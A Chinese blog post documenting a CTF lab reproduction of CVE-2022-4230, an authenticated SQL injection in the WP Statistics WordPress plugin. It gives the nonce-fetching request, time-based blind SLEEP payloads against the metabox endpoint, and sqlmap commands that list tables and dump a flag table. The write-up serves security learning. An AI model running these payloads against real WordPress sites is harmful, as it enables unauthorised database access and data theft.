春秋云镜——SQL注入漏洞复现——CVE-2022-4230

原创 已于 2024-10-24 09:21:25 修改 · 842 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#1024程序员节 #web安全 #网络安全 #数据库 #wordpress

于 2024-10-24 09:20:48 首次发布

春秋云镜——SQL注入漏洞复现

题干信息:
WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认情况下,具有管理选项功能 (admin+) 的用户可以使用受影响的功能,但是该插件有一个设置允许低权限用户也可以访问它。
1.打开题目,发现是wordpress的框架,直接test/test进入后台
在这里插入图片描述
2.查看安装好的插件
在这里插入图片描述
3.根据题目给的提示WP Statistics的版本信息为13.2.8,继续找口子
在这里插入图片描述
4.照着版本测试
获取wpnonce
/wp-admin/admin-ajax.php?action=rest-nonce

在这里插入图片描述

5.获取到的值:d3e55c6649
/wp-json/wp-statistics/v2/metabox?_wpnonce=d3e55c6649&name=words&search_engine=aaa
在这里插入图片描述

6.时间盲注poc

/wp-json/wp-statistics/v2/metabox?_wpnonce=7fe145780f&name=words&search_engine=aaa%27%20AND%20(SELECT%205671%20FROM%20(SELECT(SLEEP(5)))Mdgs)–%20HsBR

7.中途时间到了,继续获取值
/wp-admin/admin-ajax.php?action=rest-nonce
6784193c7c
在这里插入图片描述

8.时间盲注
/wp-json/wp-statistics/v2/metabox?_wpnonce=6784193c7c&name=words&search_engine=aaa

/wp-json/wp-statistics/v2/metabox?_wpnonce=6784193c7c&name=words&search_engine=aaa%27%20AND%20(SELECT%205671%20FROM%20(SELECT(SLEEP(5)))Mdgs)--%20HsBR

在这里插入图片描述

/wp-json/wp-statistics/v2/metabox?_wpnonce=6784193c7c&name=words&search_engine=aaa%27%20AND%20(SELECT%205671%20FROM%20(SELECT(SLEEP(10)))Mdgs)--%20HsBR
在这里插入图片描述
9.成功获取当前数据库
python sqlmap.py -r 1.txt --random-agent --batch --current-db
在这里插入图片描述

Payload
_wpnonce=6784193c7c&name=words&search_engine=aaa’ AND (SELECT 2568 FROM (SELECT(SLEEP(5)))UGlY) AND ‘gotj’='gotj

10.获取数据库表名
延时注入时间太长靶机又得重新启动
获取值
/wp-admin/admin-ajax.php?action=rest-nonce
baea1c41af
在这里插入图片描述

/wp-json/wp-statistics/v2/metabox?_wpnonce=baea1c41af&name=words&search_engine=aaa

C53cd095b3

/wp-json/wp-statistics/v2/metabox?_wpnonce=ceb22a74d5&name=words&search_engine=aaa

ceb22a74d5

11.总的有34张表
python sqlmap.py -r 1.txt --random-agent --batch -D wordpress --tables
在这里插入图片描述

12.因为时间原因看到flag这张表啦,直接冲
python sqlmap.py -r 1.txt --random-agent --batch -D wordpress -T flag --dump

在这里插入图片描述

13.提交成功
在这里插入图片描述

[网络安全自学篇] 八十三.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结
杨秀璋的专栏
06-09 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF隐写和逆向题目,包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。这篇文章将详细讲解一道CSS注入题目,包括CSS注入、越权、csrf-token窃取及CSP绕过,同时总结XSS绕过知识,希望对您有所帮助。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
春秋云境 CVE-2022-4230过关
weixin_49898946的博客
05-02 4055
春秋云境 CVE-2022-4230 获取flag
春秋云境 CVE-2022-4230 夺旗
05-02
介绍如何 利用 CVE-2022-4230 的 WP Statistics WordPress 插件13.2.9 漏洞利用。 漏洞描述:WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认情况下,具有管理选项功能 (admin+) 的用户可以使用受影响的功能,但是该插件有一个设置允许低权限用户也可以访问它。
WP Statistics SQL注入漏洞CVE-2022-4230
zneVue
07-30 1073
WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认情况下,具有管理选项功能 (admin+) 的用户可以使用受影响的功能,但是该插件有一个设置允许低权限用户也可以访问它。
春秋云镜 CVE-2022-4230
qq274575499的博客
05-07 2353
WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认情况下,具有管理选项功能 (admin+) 的用户可以使用受影响的功能,但是该插件有一个设置允许低权限用户也可以访问它。
春秋云境靶场之CVE-2022-4230
sjh0590的博客
09-18 1322
春秋云境靶场之CVE-2022-4230攻克过程
云镜CVE-2022-4230
m0_74347812的博客
04-29 566
默认情况下,具有管理选项功能 (admin+) 的用户可以使用受影响的功能,但是该插件有一个设置允许低权限用户也可以访问它。翻译中文:允许查看WP统计信息的用户身份登录,并通过获取随机数https://example.com/wp-admin/admin-ajax.php?需要把%27%20AND%20(SELECT%205671%20FROM%20(SELECT(SLEEP(5)))Mdgs)--%20HsBR删除掉和Upgrade-Insecure-Requests: 1。拿到随机数后,再次访问。
春秋云镜CVE-2022-23366 Hospital Management Startup 1.0 SQL注入漏洞实战解析
weixin_29327977的博客
02-12 532
本文详细解析了CVE-2022-23366 Hospital Management Startup 1.0中的SQL注入漏洞,包括漏洞原理、实战复现步骤及防御方案。通过Burp Suite和sqlmap工具演示了时间盲注技术的应用,帮助安全研究人员掌握SQL注入漏洞的检测与利用技巧,同时提供了有效的防护建议。
春秋云镜 CVE-2023-0562:银行储物柜管理系统SQL注入漏洞分析与实战利用
最新发布
weixin_29002209的博客
03-02 265
本文深入分析了CVE-2023-0562漏洞,这是一个存在于银行储物柜管理系统中的SQL注入高危漏洞。文章通过春秋云镜靶场环境,详细演示了从手动测试、Burp Suite抓包到利用sqlmap自动化工具进行漏洞利用并获取Flag的完整实战流程。同时,文章深度剖析了漏洞产生的代码根源,并提供了使用参数化查询等核心防御方案,旨在帮助开发者和安全人员理解漏洞原理并掌握有效的防护措施。
Pluck-CMS-4.7.16 主题上传功能漏洞深度解析:从CVE-2022-26965看RCE攻击链
weixin_29021757的博客
02-14 480
本文深度解析了Pluck CMS 4.7.16版本中存在的远程代码执行漏洞CVE-2022-26965)。该漏洞源于后台主题上传功能对ZIP压缩包文件缺乏安全检查,攻击者可借此上传恶意PHP文件并执行任意系统命令,从而完全控制服务器。文章详细拆解了从获取后台权限到构造恶意主题包、最终触发RCE的完整攻击链,并提供了靶场实战复现与深度防御指南。
Pluck CMS 4.7.16 主题上传漏洞深度解析:从CVE-2022-26965看RCE攻击链
weixin_29000991的博客
02-15 350
本文深度解析了Pluck CMS 4.7.16版本中存在的CVE-2022-26965远程代码执行漏洞。该漏洞源于后台主题上传功能(/admin.php?action=themeinstall)对ZIP包内文件缺乏过滤,攻击者可上传包含恶意PHP代码的主题包,从而在服务器上实现远程代码执行,构成严重安全威胁。文章详细拆解了攻击链,并提供了修复与防御建议。
春秋云境 CVE-2022-4230
weixin_53974661的博客
02-19 467
默认情况下,具有管理选项功能 (admin+) 的用户可以使用受影响的功能,但是该插件有一个设置允许低权限用户也可以访问它。以允许查看WP统计信息的用户身份登录,并通过获取随机数https://example.com/wp-admin/admin-ajax.php?使用Burp抓包,抓包时候要删 %27%20AND%20(SELECT%205671%20FROM%20(SELECT(SLEEP(5)))Mdgs)--%20HsBR。只有路径,我们先扫描路径:扫描出。
春秋云境(CVE-2022-4230)过关
cjchsh的博客
04-03 982
春秋云境
春秋云境 | SQL | CVE-2022-4230
weixin_68416970的博客
08-10 1444
WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认情况下,具有管理选项功能 (admin+) 的用户可以使用受影响的功能,但是该插件有一个设置允许低权限用户也可以访问它。WP Statistics < 13.2.9 – 经过身份验证的 SQLi |CVE 2022-4230 |插件漏洞 (wpscan.com),有兴趣可以了解下。
CVE-2022-4230
weixin_74020633的博客
06-06 759
WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认情况下,具有管理选项功能 (admin+) 的用户可以使用受影响的功能,但是该插件有一个设置允许低权限用户也可以访问它。
春秋云境:CVE-2022-32991(SQL注入
m0_65712192的博客
04-12 2446
该CMS的welcome.php中存在SQL注入攻击。
H2db console 未授权访问RCE 漏洞复现+利用(CVE-2022-23221)
0xSec
02-21 4297
H2 数据库控制台中的另一个未经身份验证的 RCE 漏洞,在 v2.1.210+ 中修复。2.1.210 之前的 H2 控制台允许远程攻击者通过包含 IGNORE_UNKNOWN_SETTINGS=TRUE;INIT=RUNSCRIPT 子字符串的 jdbc:h2:mem JDBC URL 执行任意代码。
春秋云境-28512 sql手工注入
qq_75161850的博客
04-24 1654
春秋云境-28512 sql手工注入
渗透测试的域渗透之CVE-2022-26923提权
没有网络安全就没有国家安全
03-13 1579
渗透测试的域渗透之CVE-2022-26923提权
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值